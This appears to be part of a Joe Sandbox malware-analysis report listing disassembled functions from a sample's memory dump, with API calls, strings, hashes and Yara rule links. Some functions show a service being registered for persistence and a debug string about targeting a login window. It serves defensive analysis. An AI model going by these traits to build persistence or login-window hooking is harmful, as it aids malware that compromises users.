                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_sprintf
                                                                                                                                      • String ID: file path: %s, md5 :%s, match val : %d
                                                                                                                                      • API String ID: 1557529856-2925406424
                                                                                                                                      • Opcode ID: 9f7e7b65e1437ae4c75e53b18d8a46017be57532854946acff988dd5186274ef
                                                                                                                                      • Instruction ID: ffd54b498f637d41e2da9b6db5158140111bda44a969b8f717a59cfc23eb4b94
                                                                                                                                      • Opcode Fuzzy Hash: 9f7e7b65e1437ae4c75e53b18d8a46017be57532854946acff988dd5186274ef
                                                                                                                                      • Instruction Fuzzy Hash: E7F0F4779042406BD720D788DD81FEF73946BC1305F14486DEA9F96141EA34A1088BA3
                                                                                                                                      Function 69ED0185 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EC39E0: __getptd.LIBCMT ref: 69EC39E6
                                                                                                                                        • Part of subcall function 69EC39E0: __getptd.LIBCMT ref: 69EC39F6
                                                                                                                                      • __getptd.LIBCMT ref: 69ED0194
                                                                                                                                        • Part of subcall function 69EC7833: __getptd_noexit.LIBCMT ref: 69EC7836
                                                                                                                                        • Part of subcall function 69EC7833: __amsg_exit.LIBCMT ref: 69EC7843
                                                                                                                                      • __getptd.LIBCMT ref: 69ED01A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                      • Opcode ID: 476b7c6b9b3a37e2a368f563068d30c57c37eeed4fd09a867245285f00dade62
                                                                                                                                      • Instruction ID: 60bd056e7b6632837330a7bf0fcff5d127d7d1ab90c760bd0cc4da517fbd4771
                                                                                                                                      • Opcode Fuzzy Hash: 476b7c6b9b3a37e2a368f563068d30c57c37eeed4fd09a867245285f00dade62
                                                                                                                                      • Instruction Fuzzy Hash: 1901AD7A800201CACB20CF60C54079DBBB5BF0531AFB8942ED8A266750CB79858ECF52
                                                                                                                                      Function 69E87BD8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _sprintf.LIBCMT ref: 69E87BEA
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 69E87C07
                                                                                                                                      • RegSetValueExA.ADVAPI32 ref: 69E87C56
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000004,ErrorControl,00000000,00000004,00000004,00000004), ref: 69E87C6C
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000004,Start,00000000,00000004,00000004,00000004), ref: 69E87C82
                                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000100,?,00000000), ref: 69E87C93
                                                                                                                                      • _printf.LIBCMT ref: 69E87CA6
                                                                                                                                      • _sprintf.LIBCMT ref: 69E87CBD
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000001,ImagePath,00000000,00000001,?,00000000,00000000,00000004,?,00000004), ref: 69E87CDC
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E87CE3
                                                                                                                                      • _sprintf.LIBCMT ref: 69E87CF4
                                                                                                                                      Strings
                                                                                                                                      • System\CurrentControlSet\Services\%s, xrefs: 69E87BE4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value$_sprintf$CloseCreateFullNamePath_printf
                                                                                                                                      • String ID: System\CurrentControlSet\Services\%s
                                                                                                                                      • API String ID: 2939469090-622811389
                                                                                                                                      • Opcode ID: 11e5609ac6b84d2e38a94e775688749160e0091cc1912df4abe262e92dd495bb
                                                                                                                                      • Instruction ID: 7fd2fb27a9ab9bfff64b48a8bf57b801657278dcc2cf39ccbe2e9e6e2af539ad
                                                                                                                                      • Opcode Fuzzy Hash: 11e5609ac6b84d2e38a94e775688749160e0091cc1912df4abe262e92dd495bb
                                                                                                                                      • Instruction Fuzzy Hash: F1E02B725042005FD711CB60E985AEF73D4BF88214F50895DE98DC5005E635D70C8682
                                                                                                                                      Function 69ED6B7A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 69ED6B81
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 69ED6BAC
                                                                                                                                        • Part of subcall function 69EC3660: RaiseException.KERNEL32(?,?,00000000,?), ref: 69EC36A2
                                                                                                                                      Strings
                                                                                                                                      • invalid string position, xrefs: 69ED6B86
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                      • String ID: invalid string position
                                                                                                                                      • API String ID: 1961742612-1799206989
                                                                                                                                      • Opcode ID: 7710e84c09f16a84566324b338c4ad1e27ef88a4cfaca9c64bf25db8eacf12b0
                                                                                                                                      • Instruction ID: 7972701dd3f912b14804d6e4c99a2fe06d344323fb4c3920da49b77e7af71c83
                                                                                                                                      • Opcode Fuzzy Hash: 7710e84c09f16a84566324b338c4ad1e27ef88a4cfaca9c64bf25db8eacf12b0
                                                                                                                                      • Instruction Fuzzy Hash: 3BD017B582011C9BCF04DBD4CC48FEDB37CAB14318FB0A429E251BA144EB749A09CB61
                                                                                                                                      Function 69EA4960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • OutputDebugStringA.KERNEL32(IsPorcWithTargetClass : login window,7699A040,69EA3812,00000000), ref: 69EA4968
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA496F
                                                                                                                                      Strings
                                                                                                                                      • IsPorcWithTargetClass : login window, xrefs: 69EA4967
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString
                                                                                                                                      • String ID: IsPorcWithTargetClass : login window
                                                                                                                                      • API String ID: 1166629820-4015989340
                                                                                                                                      • Opcode ID: 3fd48e976f47404746e357ebc241515cce096bc2d64524d7c2328541ee54efea
                                                                                                                                      • Instruction ID: ed8afedc7ccca62f416984169c8be09190c73e4de4ff8b32799282ca160631d3
                                                                                                                                      • Opcode Fuzzy Hash: 3fd48e976f47404746e357ebc241515cce096bc2d64524d7c2328541ee54efea
                                                                                                                                      • Instruction Fuzzy Hash: 9EC01275D142245B8600F6B8AC4486F3B999F89224714886AE44497204D935A8059BD1
                                                                                                                                      Function 69EB50D2 Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • EnterCriticalSection.KERNEL32(69EEFFE8,?,69EEFFCC,69EEFFE8,69EEFFCC,?,69EB51B1,00000000,00000000,?,?,?,?,69EB1568,00000000,00000000), ref: 69EB5131
                                                                                                                                      • LeaveCriticalSection.KERNEL32(69EEFFE8,00000000,?,69EB51B1,00000000,00000000,?,?,?,?,69EB1568,00000000,00000000,000000FF,00000010,69EAF2D6), ref: 69EB5141
                                                                                                                                      • LocalFree.KERNEL32(?,?,69EB51B1,00000000,00000000,?,?,?,?,69EB1568,00000000,00000000,000000FF,00000010,69EAF2D6,?), ref: 69EB514A
                                                                                                                                      • TlsSetValue.KERNEL32(69EEFFCC,00000000,?,69EB51B1,00000000,00000000,?,?,?,?,69EB1568,00000000,00000000,000000FF,00000010,69EAF2D6), ref: 69EB515C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2949335588-0
                                                                                                                                      • Opcode ID: 359abe89a9af1011b03965d074679c728dcc15b47ae7fbbc95b20517279c450c
                                                                                                                                      • Instruction ID: 23ae4270534a110b31b8677c0fe9ced6c4404136c5139e54d49b04b69d65ca3a
                                                                                                                                      • Opcode Fuzzy Hash: 359abe89a9af1011b03965d074679c728dcc15b47ae7fbbc95b20517279c450c
                                                                                                                                      • Instruction Fuzzy Hash: DD118B31A00605EFDB10CF55DA84F5AB7B4FF06319F20842DE562CB2A1CB71E985CB50
                                                                                                                                      Function 69EB4BD0 Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • EnterCriticalSection.KERNEL32(69EEFFE8,?,?,00000000,?,69EB522C,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4BDE
                                                                                                                                      • TlsGetValue.KERNEL32(69EEFFCC,?,00000000,?,69EB522C,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4BF2
                                                                                                                                      • LeaveCriticalSection.KERNEL32(69EEFFE8,?,00000000,?,69EB522C,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4C08
                                                                                                                                      • LeaveCriticalSection.KERNEL32(69EEFFE8,?,00000000,?,69EB522C,?,00000004,69EB4B28,69EAF4DD,69EB2D49,69E8BFE2,00000000), ref: 69EB4C13
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3969253408-0
                                                                                                                                      • Opcode ID: 00ee76f4af33517c0951e3530b31d95d1479dd8f4eaf4d7af3b463ebdca4717f
                                                                                                                                      • Instruction ID: 14caa208a80b38ce4e3c3d55953e9e887ae03675ae10194fcf7f4ef2bb67770e
                                                                                                                                      • Opcode Fuzzy Hash: 00ee76f4af33517c0951e3530b31d95d1479dd8f4eaf4d7af3b463ebdca4717f
                                                                                                                                      • Instruction Fuzzy Hash: FDF0B4BA2401009FE7118F16DA48C0677ADEB867703264426E54197205E631F985CEA1